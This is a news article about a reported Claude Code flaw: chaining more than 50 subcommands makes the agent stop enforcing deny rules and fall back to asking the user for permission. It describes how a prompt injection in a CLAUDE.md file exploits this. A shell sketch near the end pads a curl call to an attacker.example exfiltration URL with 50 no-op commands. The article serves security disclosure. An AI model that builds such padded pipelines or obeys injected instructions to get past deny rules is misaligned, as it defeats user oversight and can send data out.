A security flaw in Claude Code allows attackers to bypass its deny rules by chaining more subcommands than a hard-coded limit allows. The vulnerability, discovered by security firm Adversa, opens the door to prompt injection attacks that could trigger malicious actions such as unauthorized network requests via curl. The issue stems from how the agent handles security subcommands: once the hard cap is exceeded, it falls back to asking the user for permission instead of enforcing its deny rules.
Claude Code will ignore its deny rules, used to block risky actions, if burdened with a sufficiently long chain of subcommands. The vuln leaves the bot open to prompt injection attacks. Adversa, a security firm based in Tel Aviv, Israel, spotted the issue following the leak of Claude Code's source.
Claude Code implements various mechanisms for allowing and denying access to specific tools. Some of these, like curl, which enables network requests from the command line, might pose a security risk if invoked by an over-permissive AI model. One way the coding agent tries to defend against unwanted behavior is through deny rules that disallow specific commands, for example a rule that prevents Claude from invoking curl.

But deny rules have limits. The source code file bashPermissions.ts contains a comment that references an internal Anthropic issue designated CC-643. The associated note explains that there's a hard cap of 50 on security subcommands, set by a variable in the code. Past 50, the agent falls back to asking the user for permission. The comment explains that 50 is a generous allowance for legitimate usage. "But it didn't account for AI-generated commands from prompt injection – where a malicious CLAUDE.md file instructs the AI to generate a 50+ subcommand pipeline that looks like a legitimate build process."

The Adversa team's proof-of-concept attack was simple: they created a bash command that combined 50 no-op "true" subcommands with a curl subcommand. Claude asked for authorization to proceed instead of denying curl access outright.

In scenarios where an individual developer is watching and approving coding agent actions, this rule bypass might be caught. But developers often grant automatic approval to agents, or just click through reflexively during long sessions. The risk is similar in CI/CD pipelines that run Claude Code in non-interactive mode.

Ironically, Anthropic has already developed a fix: a parser referred to as "tree-sitter" that is also evident in the leaked source and is available internally, but not in public builds. Adversa argues that this is a bug in the security policy enforcement code, one with regulatory and compliance implications if not addressed.
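Based on the article's description, the two halves of the problem can be sketched as follows. The deny-rule file path and rule syntax follow Anthropic's public settings documentation for Claude Code; the attacker URL and the exact shape of the pipeline are assumptions for illustration, not Adversa's published exploit.

```shell
#!/usr/bin/env bash
# Sketch reconstructed from the article; not Adversa's actual PoC.

# 1. A deny rule intended to block curl, in the project's
#    .claude/settings.json (format per Claude Code's settings docs).
mkdir -p .claude
cat > .claude/settings.json <<'EOF'
{
  "permissions": {
    "deny": ["Bash(curl:*)"]
  }
}
EOF

# 2. A command of the shape the article describes: 50 no-op "true"
#    subcommands chained ahead of a curl call. Past the 50-subcommand
#    cap, Claude Code reportedly stops enforcing deny rules and merely
#    asks the user for permission.
bypass="true"
for _ in $(seq 2 50); do
  bypass="$bypass && true"
done
bypass="$bypass && curl https://attacker.example/exfil"

echo "$bypass"   # printed only; never executed here
```

A prompt-injection payload in a CLAUDE.md file would steer the model into emitting a pipeline like this one, disguised as a long build step, rather than the attacker typing it directly.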
Anthropic already has "tree-sitter" working internally, and a simple one-line change, switching the "behavior" key from "ask" to "deny" in the bashPermissions.ts file at line 2174, would address this particular vulnerability.